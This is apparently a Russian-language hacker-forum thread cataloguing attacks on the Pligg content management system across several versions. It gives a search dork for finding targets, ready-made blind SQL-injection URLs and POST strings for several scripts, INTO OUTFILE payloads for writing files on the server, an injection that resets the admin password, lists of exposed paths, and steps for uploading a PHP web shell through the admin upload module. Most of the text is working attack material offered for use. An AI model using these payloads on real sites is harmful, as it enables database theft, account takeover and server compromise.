Обзор уязвимостей Pligg
 

Продукт:

Pligg Content Management System
Beta 9.8
09.08.2007
Homepage: http://www.pligg.com

Дорк:

Powered By Pligg

Blind SQL-injection
magic_quotes = off
/out.phpexploit:

http://pligg/out.php?title=' union select if(true,1,null) -- -
http://pligg/out.php?title=' union select if(false,1,null) -- -

example:
exploit:

http://pligg/out.php?url=' union select if(true,1,null) -- -
http://pligg/out.php?url=' union select if(false,1,null) -- -

example:
Blind SQL-injection
register_globals = on
/userrss.php
exploit

http://pligg/userrss.php?user=god&rows=5&status=1&order_field=l ink_date&from_where=from pligg_links where link_id=1 and true -- -
http://pligg/userrss.php?user=god&rows=5&status=1&order_field=l ink_date&from_where=from pligg_links where link_id=1 and false -- -

example
Blind SQL-injection
magic_quotes_gpc = off
/login.php
exploit:

POST:http://pligg/login.php?processlogin=3&username=root' or false -- -
POST:http://pligg/login.php?processlogin=3&username=root' or true -- -

if file_priv=Y
/login.php?processlogin=3&username=root' union select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20 ,21,22,23,24,25 into outfile '/path/pligg.txt' -- -

Blind SQL-injection
magic_quotes = off
/story.php
exploit:

http://pligg/story.php?title=существующий title' and (substring(version(),1,1))>1-- -

example:
Blind SQL-injection
/editlink.php
exploit

http://pligg/editlink.php?id=-1 union select 1,if(true,'god',1)-- -
http://pligg/editlink.php?id=-1 union select 1,if(false,'god',1)-- -

if file_priv=Y
http://pligg/editlink.php?id=-1 union select 1,2 into outfile 'c:/pligg.txt'-- -

example:
(c) AFoST

AFoST, в версии 1.0.0. все Blind'и не работают)
т.е. разработчики добавили ф-цию "антихак" sanitize(, и теперь код уже выглядит уже так%

Pligg 1.0.0

pXSS
/register_complete.phpexploit:example:Full path disclosure

Full path disclosure

/Config_File.class.php
/Smarty_Compiler.class.php
/Smarty_Test.class.php
/class.compiler.php
/podcast.php
/settings.php

Directory listing
при удачном htaccess

http://pligg/cache/
http://pligg/internal/
http://pligg/evb/
http://pligg/libs/
http://pligg/modules/
http://pligg/plugins/
http://pligg/templates/
http://pligg/templates_c/

Она и в той версии был) но не везде =)
В этом двиге тот самый интересный Сцукокод на смену админского пароля)) Докрутить б...

User password reset to "password"

Спасибо Gifts за помощь

exploit:

/login.php?processlogin=4&username=" or user_login = "god" /*' and 1=0 UNION select 123/*&confirmationcode=123

Version: 1.0.1 (возможно более ранние версии)
Default table prefix: pligg_

SQL Injection

Vuln file: /libs/search.php
кода довольно много, приводить не буду

Exploit:
Version: 1.0.3 (последняя на данный момент)

Blind SQL Injection

Vuln file: /libs/search.php
Exploit:Вывода как в версии 1.0.1 не получилось добиться, т.к по дефолту в конфиге "error_reporting(E_ERROR)", поэтому крутим как blind.
Написал эксплойт под это дело.
или берем с pastebin.com
Пример работы (получение login'а админа):Passive XSS
Exploit:Upload shell
Need:admin account

Admin --> Modules
Устанавливаем модуль Upload (по дефолту не установлен), включаем модуль (кликаем Disable).
Далее переходим в Settings --> General Settings
в Allowed File Type дописываем расширение php.
Добавляем новость и прикрепляем шелл. Шелл будет в /modules/upload/attachments/[name_shell].php

RulleR, даже если вывода через ошибку нет, всё равно в сплоитах стоит использовать бинарный поиск, как минимум.